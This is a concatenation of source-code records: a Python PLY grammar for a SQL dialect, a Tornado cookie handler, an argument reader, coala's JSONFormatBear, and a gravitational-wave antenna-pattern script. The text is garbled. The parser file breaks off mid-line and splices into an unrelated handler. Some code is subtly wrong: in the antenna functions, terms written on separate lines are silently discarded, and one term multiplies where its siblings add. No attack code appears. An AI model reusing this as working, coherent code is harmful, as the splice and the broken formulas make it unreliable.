PARCIERRE\n | COS PARABRE op_numero PARCIERRE\n | COSD PARABRE op_numero PARCIERRE\n | COT PARABRE op_numero PARCIERRE\n | COTD PARABRE op_numero PARCIERRE\n | SIN PARABRE op_numero PARCIERRE\n | SIND PARABRE op_numero PARCIERRE\n | TAN PARABRE op_numero PARCIERRE\n | TAND PARABRE op_numero PARCIERRE\n | SINH PARABRE op_numero PARCIERRE\n | COSH PARABRE op_numero PARCIERRE\n | TANH PARABRE op_numero PARCIERRE\n | ASINH PARABRE op_numero PARCIERRE\n | ACOSH PARABRE op_numero PARCIERRE\n | ATANH PARABRE op_numero PARCIERRE '''\n if t.slice[1].type == 'ACOS':\n t[0] = Acos(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ACOSD':\n t[0] = Acosd(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ASIN':\n t[0] = Asin(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ASIND':\n t[0] = Asind(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ATAN':\n t[0] = Atan(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ATAND':\n t[0] = Atand(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ATAN2':\n t[0] = Atan2(t[3],t[5],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 
'ATAN2D':\n t[0] = Atan2d(t[3],t[5],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'COS':\n t[0] = Cos(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'COSD':\n t[0] = Cosd(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'COT':\n t[0] = Cot(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'COTD':\n t[0] = Cotd(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'SIN':\n t[0] = Sin(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'SIND':\n t[0] = Sind(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'TAN':\n t[0] = Tan(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'TAND':\n t[0] = Tand(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'SINH':\n t[0] = Sinh(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'COSH':\n t[0] = Cosh(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'TANH':\n t[0] = Tanh(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ASINH':\n t[0] = Asinh(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ACOSH':\n t[0] = Acosh(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ATANH':\n t[0] = Atanh(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n\ndef p_string_func(t): # TODO: fix grammar\n '''string_func : LENGTH PARABRE s_param PARCIERRE\n | SUBSTRING PARABRE s_param COMA NUMERO COMA NUMERO PARCIERRE\n | TRIM PARABRE s_param PARCIERRE\n | GET_BYTE PARABRE s_param COMA NUMERO PARCIERRE\n | MD5 PARABRE s_param PARCIERRE\n | SET_BYTE PARABRE s_param COMA NUMERO COMA s_param PARCIERRE\n | SHA256 PARABRE s_param PARCIERRE\n | SUBSTR PARABRE s_param COMA NUMERO COMA NUMERO PARCIERRE\n | CONVERT PARABRE tipo_dato COMA ID dot_table PARCIERRE\n | ENCODE PARABRE s_param COMA s_param PARCIERRE\n | DECODE PARABRE s_param COMA s_param PARCIERRE '''\n if t.slice[1].type == 'LENGTH':\n t[0] = Length(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'SUBSTRING':\n op1 = Literal(t[5],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n op2 = Literal(t[7],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n t[0] = Substring(t[3],op1,op2,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'SUBSTR':\n op1 = Literal(t[5],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n op2 = Literal(t[7],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n t[0] = Substr(t[3],op1,op2,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'TRIM':\n t[0] = Trim(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'GET_BYTE':\n op1 = Literal(t[5],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n t[0] = Get_Byte(t[3],op1,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'MD5':\n t[0] = Md5(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'SET_BYTE':\n op1 = Literal(t[5],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n t[0] = Set_Byte(t[3],op1,t[7],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'SHA256':\n t[0] = Sha256(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n\ndef p_s_param(t):\n '''s_param : s_param string_op s_param\n | CADENA\n | CADENASIMPLE\n | NUMERO'''\n if t.slice[1].type == 'CADENA' or t.slice[1].type == 'CADENASIMPLE':\n t[0] = Literal(t[1],Type.STRING,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'NUMERO':\n t[0] = Literal(t[1],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n else:\n t[0] = Stringop(t[1],t[3],t[2],t.slice[2].lexpos,t.slice[2].lineno)\n\ndef p_string_op(t):\n '''string_op : SIGNO_PIPE\n | SIGNO_DOBLE_PIPE\n | SIGNO_AND\n | SIGNO_VIRGULILLA\n | SIGNO_NUMERAL\n | SIGNO_DOBLE_MENORQUE\n | SIGNO_DOBLE_MAYORQUE'''\n t[0] = t[1]\n\ndef p_time_func(t):\n '''time_func : DATE_PART PARABRE h_m_s COMA INTERVAL F_HORA PARCIERRE \n | NOW PARABRE PARCIERRE\n | EXTRACT PARABRE reserv_time FROM TIMESTAMP FECHA_HORA PARCIERRE\n | TIMESTAMP CADENASIMPLE\n | CURRENT_TIME\n | CURRENT_DATE'''\n if t.slice[1].type == 'NOW':\n t[0] = Now(t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'TIMESTAMP':\n if t[2].upper() == 'NOW':\n t[0] = Now(t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'CURRENT_TIME':\n t[0] = Current_Time(t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'CURRENT_DATE':\n t[0] = Current_Date(t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'EXTRACT':\n fecha = Literal(t[6],Type.DATE,t.slice[6].lexpos,t.slice[6].lineno)\n t[0] = Extract(t[3],fecha,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'DATE_PART':\n interval = Literal(t[6],Type.DATE,t.slice[6].lexpos,t.slice[6].lineno)\n t[0] = Date_Part(t[3],interval,t.slice[1].lexpos,t.slice[1].lineno)\n\ndef p_reserv_time(t):\n '''reserv_time : h_m_s \n | YEAR\n | MONTH\n | DAY'''\n t[0] = t[1]\n\ndef p_h_m_s(t):\n '''h_m_s : HOUR\n | MINUTE\n | SECOND \n | CADENASIMPLE'''\n t[0] = t[1]\n\ndef p_param(t):\n '''param : ID dot_table\n | SIGNO_POR '''\n if t.slice[1].type == 'ID':\n if t[1] != None:\n t[0] = Id(t[2], t[1],t.slice[1].lexpos,t.slice[1].lineno)\n else:\n t[0] = t[1]\n else: \n t[0] = t[1]\n\n\ndef p_table_list(t):\n '''table_list : table_list COMA ID as_id\n | ID as_id'''\n if len(t) == 5:\n t[1].append({'name': t[3], 'as': t[4]})\n t[0] = t[1]\n else:\n t[0] = [{'name': t[1], 'as': t[2]}]\n\ndef p_arg_where(t):\n '''arg_where : WHERE PARABRE exp PARCIERRE\n | '''\n if len(t) == 5:\n t[0] = t[3]\n else:\n t[0] = None\n\ndef p_arg_having(t):\n '''arg_having : HAVING PARABRE exp PARCIERRE\n | '''\n if len(t) == 5:\n t[0] = t[3]\n else:\n t[0] = None\n\ndef p_exp(t):\n '''exp : exp SIGNO_MAS exp\n | exp SIGNO_MENOS exp \n | exp SIGNO_POR exp \n | exp SIGNO_DIVISION exp \n | exp SIGNO_MODULO exp \n | exp SIGNO_POTENCIA exp \n | exp OR exp \n | exp AND exp \n | exp MENORQUE exp \n | exp MAYORQUE exp \n | exp MAYORIGUALQUE exp \n | exp MENORIGUALQUE exp \n | exp SIGNO_IGUAL exp\n | exp SIGNO_MENORQUE_MAYORQUE exp\n | exp SIGNO_NOT exp \n | arg_pattern\n | sub_consulta\n | NOT exp\n | EXISTS PARABRE ins_select PARCIERRE \n | NOT EXISTS PARABRE ins_select PARCIERRE \n | data\n | predicates\n | aggregates\n | functions\n | arg_case\n | arg_greatest\n | arg_least \n | val_value'''\n \n try:\n if t.slice[1].type == 'NOT' and t.slice[2].type != 'EXISTS':\n t[0] = Logic(t[2],None,t[1], t.slice[1].lexpos,t.slice[1].lineno)\n\n elif t.slice[2].type == 'SIGNO_MAS' or t.slice[2].type == 'SIGNO_MENOS' or t.slice[2].type == 'SIGNO_POR' or t.slice[2].type == 'SIGNO_DIVISION' or t.slice[2].type == 'SIGNO_MODULO' or t.slice[2].type == 'SIGNO_POTENCIA':\n t[0] = Arithmetic(t[1],t[3],t[2], t.slice[2].lexpos,t.slice[2].lineno) \n \n elif t.slice[2].type == 'MENORQUE' or t.slice[2].type == 'MAYORQUE' or t.slice[2].type == 'MAYORIGUALQUE' or t.slice[2].type == 'MENORIGUALQUE' or t.slice[2].type == 'SIGNO_IGUAL' or t.slice[2].type == 'SIGNO_MENORQUE_MAYORQUE':\n t[0] = Relational(t[1],t[3],t[2], t.slice[2].lexpos,t.slice[2].lineno)\n \n elif t.slice[2].type == 'OR' or t.slice[2].type == 'AND' :\n t[0] = Logic(t[1],t[3],t[2], t.slice[2].lexpos,t.slice[2].lineno) \n elif t.slice[1].type == 'EXISTS':\n t[0] = Relational(t[3],None,1, t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'EXISTS':\n t[0] = Relational(t[4],None,2, t.slice[2].lexpos,t.slice[2].lineno)\n\n \n except IndexError:\n t[0] = t[1]\n\n\ndef p_arg_greatest(t):\n '''arg_greatest : GREATEST PARABRE exp_list PARCIERRE''' \n t[0] = Greatest(t[3], t.slice[2].lexpos,t.slice[2].lineno)\n\ndef p_arg_least(t):\n '''arg_least : LEAST PARABRE exp_list PARCIERRE''' \n t[0] = Least(t[3], t.slice[2].lexpos,t.slice[2].lineno)\n\ndef p_exp_list(t):\n '''exp_list : exp_list COMA exp\n | exp'''\n if len(t) == 4:\n t[1].append(t[3])\n t[0] = t[1]\n else:\n t[0] = [t[1]]\n\ndef p_case(t):\n '''arg_case : CASE arg_when arg_else END''' \n diccionario = {'when': t[2], 'then':t[3]}\n t[0] = Case(diccionario, t.slice[1].lexpos,t.slice[1].lineno)\n\ndef p_arg_when(t):\n '''arg_when : arg_when WHEN exp THEN exp\n | WHEN exp THEN exp'''\n if len(t) == 6:\n t[1].append({'exp1': t[3], 'exp2': t[5]})\n t[0] = t[1]\n else:\n t[0] = [{'exp1': t[2], 'exp2': t[4]}]\n \ndef p_arg_else(t):\n '''arg_else : ELSE exp\n | ''' # epsilon\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_predicates(t):\n '''predicates : data BETWEEN list_vls AND list_vls\n | data NOT BETWEEN list_vls AND list_vls\n | data BETWEEN SYMMETRIC list_vls AND list_vls \n | data NOT BETWEEN SYMMETRIC list_vls AND list_vls\n | data IS DISTINCT FROM list_vls\n | data IS NOT DISTINCT FROM list_vls\n | data IS NULL \n | data ISNULL\n | data NOTNULL\n | data IS TRUE\n | data IS NOT TRUE\n | data IS FALSE\n | data IS NOT FALSE\n | data IS UNKNOWN\n | data IS NOT UNKNOWN'''\n\n if t.slice[2].type == 'ISNULL':\n t[0] = Predicates(t[1],None,None, 'ISNULL', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'NOTNULL':\n t[0] = Predicates(t[1],None,None, 'NOTNULL', t.slice[2].lexpos,t.slice[2].lineno)\n \n elif t.slice[2].type == 'IS' and t.slice[3].type == 'NULL':\n t[0] = Predicates(t[1],None,None, 'IS NULL', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'IS' and t.slice[3].type == 'TRUE' :\n t[0] = Predicates(t[1],None,None, 'IS TRUE', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'IS' and t.slice[3].type == 'FALSE' :\n t[0] = Predicates(t[1],None,None, 'IS FALSE', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'IS' and t.slice[3].type == 'UNKNOWN' :\n t[0] = Predicates(t[1],None,None, 'IS UNKNOWN', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'IS' and t.slice[3].type == 'NOT' and t.slice[4].type == 'TRUE':\n t[0] = Predicates(t[1],None,None, 'IS NOT TRUE', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'IS' and t.slice[3].type == 'NOT' and t.slice[4].type == 'FALSE':\n t[0] = Predicates(t[1],None,None, 'IS NOT FALSE', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'IS' and t.slice[3].type == 'NOT' and t.slice[4].type == 'UNKNOWN':\n t[0] = Predicates(t[1],None,None, 'IS NOT UNKNOWN', t.slice[2].lexpos,t.slice[2].lineno)\n\n elif t.slice[2].type == 'IS' and t.slice[3].type == 'DISTINCT' :\n t[0] = Predicates(t[1],t[5],None, 'IS DISTINCT', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'BETWEEN' and t.slice[3].type != 'SYMMETRIC':\n t[0] = Predicates(t[1],t[3],t[5], 'BETWEEN', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'IS' and t.slice[3].type == 'NOT' and t.slice[4].type == 'DISTINCT' :\n t[0] = Predicates(t[1],t[6],None, 'IS NOT DISTINCT', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'NOT' and t.slice[3].type == 'BETWEEN' and t.slice[4].type != 'SYMMETRIC' :\n t[0] = Predicates(t[1],t[4],t[6], 'NOT BETWEEN', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'BETWEEN' and t.slice[3].type == 'SYMMETRIC':\n t[0] = Predicates(t[1],t[4],t[6], 'BETWEEN SYMMETRIC', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'NOT' and t.slice[3].type == 'BETWEEN' and t.slice[4].type == 'SYMMETRIC' :\n t[0] = Predicates(t[1],t[5],t[7], 'NOT BETWEEN SYMMETRIC', t.slice[2].lexpos,t.slice[2].lineno)\n\ndef p_data(t):\n '''data : ID table_at''' \n t[0] = Id(t[1],t[2], t.slice[1].lexpos,t.slice[1].lineno)\n\ndef p_table_at(t):\n '''table_at : PUNTO ID\n | ''' #epsilon\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n \ndef p_sub_consulta(t):\n '''sub_consulta : PARABRE ins_select PARCIERRE''' \n t[0] = t[2]\n\ndef p_arg_pattern(t):\n '''arg_pattern : data LIKE CADENA \n | data NOT LIKE CADENA ''' \n\ndef p_arg_group_by(t):\n '''arg_group_by : GROUP BY g_list\n | ''' #epsilon\n if len(t) == 4:\n t[0] = t[3]\n else:\n t[0] = None\n\ndef p_g_list(t):\n '''g_list : g_list COMA g_item\n | g_item ''' \n if len(t) == 4:\n t[1].append(t[3])\n t[0] = t[1]\n else:\n t[0] = [t[1]]\n\ndef p_g_item(t):\n '''g_item : ID g_refitem''' \n if t[2] == None:\n t[0] = {'father':None, 'id': t[1]}\n else:\n t[0] = {'father': t[1], 'id': t[2]}\n\ndef p_g_refitem(t):\n '''g_refitem : PUNTO ID\n | ''' #epsilon\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_arg_order_by(t):\n '''arg_order_by : ORDER BY o_list\n | ''' #epsilon\n if len(t) == 4:\n t[0] = t[3]\n else:\n t[0] = None\n\ndef p_o_list(t):\n '''o_list : o_list COMA o_item\n | o_item ''' \n if len(t) == 4:\n t[1].append(t[3])\n t[0] = t[1]\n else:\n t[0] = [t[1]]\n\ndef p_o_item(t):\n '''o_item : ID o_refitem ad arg_nulls''' \n if t[2] != None:\n t[0] = {'father': t[1], 'id': t[2], 'ad': t[3], 'nulls': t[4]}\n else:\n t[0] = {'father': None, 'id': t[1], 'ad': t[3], 'nulls': t[4]}\n\ndef p_o_refitem(t):\n '''o_refitem : PUNTO ID\n | ''' #epsilon\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_ad(t):\n '''ad : ASC\n | DESC\n | ''' #epsilon\n if len(t) == 2:\n t[0] = t[1]\n else:\n t[0] = None\n\ndef p_arg_nulls(t):\n '''arg_nulls : NULLS arg_fl\n | ''' #epsilon\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_arg_fl(t):\n '''arg_fl : FIRST\n | LAST'''\n t[0] = t[1]\n\ndef p_arg_limit(t):\n '''arg_limit : LIMIT option_limit\n | ''' #epsilon\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_option_limit(t):\n '''option_limit : NUMERO\n | ALL ''' \n t[0] = t[1]\n\ndef p_arg_offset(t):\n '''arg_offset : OFFSET NUMERO \n | ''' #epsilon\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_ins_update(t):\n '''ins_update : UPDATE ID SET asign_list WHERE exp PUNTO_COMA '''\n t[0] = Update(t[2], t[4], t[6], t.slice[2].lexpos, t.slice[2].lineno)\n\ndef p_ins_asign_list(t):\n '''asign_list : asign_list COMA ID SIGNO_IGUAL exp \n | ID SIGNO_IGUAL exp'''\n if len(t) == 6:\n t[1].append({'id': t[3], 'value': t[5]})\n t[0] = t[1]\n else: \n t[0] = [{'id': t[1], 'value': t[3]}]\n\ndef p_ins_delete(t):\n '''ins_delete : DELETE FROM ID WHERE exp PUNTO_COMA'''\n t[0] = Delete(t[3], t[5], t.slice[2].lexpos, t.slice[2].lineno)\n\ndef p_ins_create_pl(t):\n '''ins_create_pl : CREATE op_replace FUNCTION ID PARABRE parameters PARCIERRE returns AS block LANGUAGE ID PUNTO_COMA\n | CREATE op_replace PROCEDURE ID PARABRE parameters PARCIERRE AS block LANGUAGE ID PUNTO_COMA\n '''\n\ndef p_op_replace(t):\n '''op_replace : OR REPLACE\n | '''\n\ndef p_parameters(t):\n '''parameters : parameters COMA ID tipo_dato\n | parameters COMA tipo_dato\n | ID tipo_dato\n | tipo_dato\n |\n '''\n\ndef p_returns(t):\n '''returns : RETURNS exp\n | RETURNS ANYELEMENT\n | RETURNS TABLE PARABRE parameters PARCIERRE \n | RETURNS ANYCOMPATIBLE\n | RETURNS tipo_dato\n | RETURNS VOID\n | \n '''\n\ndef p_block(t):\n '''block : DOLAR_LABEL body PUNTO_COMA DOLAR_LABEL\n '''\n\ndef p_body(t):\n '''body : declare_statement BEGIN internal_block END \n '''\n\ndef p_declare(t):\n '''declare_statement : DECLARE\n | declare_statement statements \n | '''\n\ndef p_declaracion(t):\n '''declaracion : ID constante tipo_dato not_null declaracion_default PUNTO_COMA'''\n print('DECLARATION')\n\ndef p_internal_block(t):\n '''internal_block : internal_block internal_body \n | internal_body \n | \n '''\n\ndef p_internal_body(t):\n '''internal_body : body PUNTO_COMA\n | instruccion_if\n | instruccion_case\n | return\n | statements\n '''\n\ndef p_constante(t):\n '''constante : CONSTANT'''\n\ndef p_constante_null(t):\n '''constante : '''\n\ndef p_not_null(t):\n '''not_null : NOT NULL'''\n\ndef p_not_null_null(t):\n '''not_null : '''\n\ndef p_declaracion_default(t):\n '''declaracion_default : DEFAULT exp'''\n\ndef p_declaracion_default_dos(t):\n '''declaracion_default : SIGNO_IGUAL exp '''\n print('ENTERS =')\n\ndef p_declaracion_default_signo(t):\n '''declaracion_default : DOSPUNTOS SIGNO_IGUAL exp'''\n print('ENTERS :=')\n\ndef p_declaracion_default_null(t):\n '''declaracion_default : '''\n\ndef p_declaracionf_funcion(t):\n '''declaracion_funcion : ID ALIAS FOR DOLAR NUMERO PUNTO_COMA'''\n print('ALIAS')\n\ndef p_declaracionf_funcion_rename(t):\n '''declaracion_funcion : ID ALIAS FOR ID PUNTO_COMA'''\n print('ALIAS RENAME')\n\ndef p_declaracionc_copy(t):\n '''declaracion_copy : ID ID PUNTO ID SIGNO_MODULO TYPE PUNTO_COMA'''\n print('COPY TYPE')\n\ndef p_declaracionr_row(t):\n '''declaracion_row : ID ID SIGNO_MODULO ROWTYPE PUNTO_COMA'''\n print('COPY ROW')\n\ndef p_declaracionre_record(t):\n '''declaracion_record : ID RECORD PUNTO_COMA'''\n print('RECORD')\n\ndef p_asignacion(t):\n '''asignacion : ID referencia_id SIGNO_IGUAL exp PUNTO_COMA'''\n print('ASSIGNMENT')\n #t[0] = GenerarC3D()\n #t[0].code = t[1] + ' = \\n'\n\ndef p_asignacion_igual(t):\n '''asignacion : ID referencia_id SIGNO_IGUAL ins_select PUNTO_COMA'''\n print('ASSIGNMENT')\n #t[0] = GenerarC3D()\n #t[0].code = t[1] + ' = \\n'\n\ndef p_asignacion_dos(t):\n '''asignacion : ID referencia_id DOSPUNTOS SIGNO_IGUAL exp PUNTO_COMA'''\n print('ASSIGNMENT')\n #t[0] = GenerarC3D()\n #t[0].code = t[1] + ' = \\n'\n\ndef p_asignacion_dos_signo(t):\n '''asignacion : ID referencia_id DOSPUNTOS SIGNO_IGUAL ins_select PUNTO_COMA'''\n print('ASSIGNMENT')\n #t[0] = GenerarC3D()\n #t[0].code = t[1] + ' = parser.parse(\n \n \n \"\"\"\n self.write(html)\n\n def post(self):\n name = self.get_argument('name')\n if self.request.cookies.get(name, None):\n # the cookie exists\n self.clear_cookie(name)\n self.write('Deleted %s successfully' % name)\n else:\n self.write('Failed to delete %s: it does not exist!' % name)\n\n # When redirecting there is no need to call self.write()\n self.redirect('/cookie') # redirect\n","sub_path":"app/views/cookie.py","file_name":"cookie.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"114092240","text":"\"\"\"\n Created by Xiaozhong on 2018/11/5.\n Copyright (c) 2018/11/5 Xiaozhong. All rights reserved.\n\"\"\"\n\nimport sys\n#\n#\n# arg = sys.argv[0]\n# print(\"The first argument is: \" + str(arg))\n#\n# arg = sys.argv[1]\n# print(\"The second argument is: \" + str(arg))\n\n# Read the console arguments and store them as a dict\ncmdss = {}\nfor index in range(1, len(sys.argv)):\n if index % 2 != 0:\n cmdss[sys.argv[index]] = sys.argv[index + 1]\n\nprint(cmdss)\n","sub_path":"python_learning/sample_python2exe/cmd_reader.py","file_name":"cmd_reader.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"150036025","text":"import json\nfrom collections import OrderedDict\n\nfrom coala_utils.param_conversion import negate\nfrom coalib.bearlib import deprecate_settings\nfrom coalib.bearlib.spacing.SpacingHelper import SpacingHelper\nfrom coalib.bears.LocalBear import LocalBear\nfrom coalib.misc.Compatibility import JSONDecodeError\nfrom coalib.results.Diff import Diff\nfrom coalib.results.Result import Result\n\n\nclass JSONFormatBear(LocalBear):\n\n LANGUAGES = {'JSON'}\n AUTHORS = {'The coala developers'}\n AUTHORS_EMAILS = {'coala-devel@googlegroups.com'}\n ASCIINEMA_URL = 'https://asciinema.org/a/6vxc7076tnf996zanpdfwojwu'\n LICENSE = 'AGPL-3.0'\n CAN_DETECT = {'Formatting'}\n\n @deprecate_settings(indent_size='tab_width',\n escape_unicode=('keep_unicode', negate))\n def run(self, filename, file,\n json_sort: bool=False,\n indent_size: int=SpacingHelper.DEFAULT_TAB_WIDTH,\n escape_unicode: bool=True):\n \"\"\"\n Raises issues for any deviations from the pretty-printed JSON.\n\n :param json_sort: Whether or not keys should be sorted.\n :param indent_size: Number of spaces per indentation level.\n :param escape_unicode: Whether or not to escape unicode values using\n ASCII.\n \"\"\"\n try:\n json_content = json.loads(''.join(file),\n object_pairs_hook=OrderedDict)\n except JSONDecodeError as err:\n yield Result.from_values(\n self,\n 'This file does not contain parsable JSON. 
' + repr(str(err)),\n file=filename)\n return\n\n corrected = json.dumps(json_content,\n sort_keys=json_sort,\n indent=indent_size,\n ensure_ascii=escape_unicode\n ).splitlines(True)\n # Because of a bug in several python versions we have to correct\n # whitespace here.\n corrected = tuple(line.rstrip(' \\n') + '\\n' for line in corrected)\n diff = Diff.from_string_arrays(file, corrected)\n\n if len(diff) > 0:\n yield Result(self,\n 'This file can be reformatted by sorting keys and '\n 'following indentation.',\n affected_code=tuple(d.range(filename)\n for d in diff.split_diff()),\n diffs={filename: diff})\n","sub_path":"ve/Lib/site-packages/bears/js/JSONFormatBear.py","file_name":"JSONFormatBear.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"545587109","text":"from __future__ import division\n\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport random\nimport pylab\n\ndef AP_PLUS(eta,a,b,psi):\n ret = math.sin(eta) * ((a * math.cos(2 * psi)) + (b * math.sin(2 * psi))) \n return ret\n \ndef AP_CROSS(eta,a,b,psi):\n ret = math.sin(eta) * ((b * math.cos(2 * psi)) - (a * math.sin(2 * psi)))\n return ret\n\ndef afunction(chi, beta, theta, phi, lambd):\n ret = ((1/16) * math.sin(2 * chi) * (3 - math.cos(2 * beta)) * (3 - math.cos(2 * theta))\n * math.cos(2 * (phi + lambd)))\n \n + ((1/4) * math.cos(2 * chi) * math.sin(beta) * (3 - math.cos(2 * theta))\n * math.sin(2 * (phi + lambd)))\n \n + ((1/4) * math.sin(2 * chi) * math.sin(2 * beta) * math.sin(2 * theta) * math.cos(phi + lambd))\n \n + ((1/2) * math.cos(2 * chi) * math.cos(beta) * math.sin(2 * theta) * math.sin(phi + lambd))\n \n + ((3/4) * math.sin(2 * chi) * (math.cos(beta) ** 2) * (math.sin(theta) ** 2))\n return ret\n \ndef bfunction(chi, beta, theta, phi, lambd):\n ret = (math.cos(2 * chi) * math.sin(beta) * math.cos(theta) * math.cos(2 * (phi + lambd)))\n \n - ((1/4) * math.sin(2 * chi) * (3 - math.cos(2 * beta)) * math.cos(theta) * math.sin(2 * (phi * lambd)))\n \n + (math.cos(2 * chi) * math.cos(beta) * math.sin(theta) * math.cos(phi + lambd))\n \n - ((1/2) * math.sin(2 * chi) * math.sin(2 * beta) * math.sin(theta) * math.sin(phi + lambd))\n return ret\n\ndef COMPASS_TO_ANGLE(compassdirection):\n ret = ((5 * math.pi) / 2) - compassdirection\n return ret\n \ndef DMS_TO_DEGREES(degs, mins, secs):\n ret = degs + (mins/60) + (secs/3600)\n return ret\n\ndef standarddev (x, mu, N):\n summ = 0\n for deff in range(0, N):\n adder = (x[deff] - mu) ** 2\n summ = summ + adder\n ret = math.sqrt(summ/(N-1))\n return ret\n\ndef VolumeSphere(r):\n ret = (4/3) * math.pi * (r ** 3)\n return ret\n\ndef VolumeShell(min, max):\n ret = VolumeSphere(max) - VolumeSphere(min)\n return ret\n\ndef VolumeGpc(min, max, percent):\n ret = str((VolumeShell(min, max) * percent) / (1000 ** 3))\n return ret\n\ndef AntennaPowerSingle(theta, phi):\n ret = ((1/4) * ((1 + (math.cos(theta) ** 2)) ** 2) * (math.cos(2 * phi) ** 2)) + ((math.cos(theta) ** 2) * (math.sin(2 * phi) ** 2))\n return ret\n\nDv_LOUIS, Dv_WASH, Dv_VIRGO = 190, 190, 145\ntrials = 100 # input(\"Enter the number of points you want to test: \") + 1\niterations = 100\nGWPERCENTMEAN, GWFINALnum = [], 0\nminDistance = 0 #Min distance of generation in Mpc\nmaxDistance = 450 #Max distance of generation in Mpc\n\nantennaPowerPatternLouis = []\nantennaPowerPatternSingle = []\ninclinationMultiplier = []\nfor q in range(0,iterations):\n 
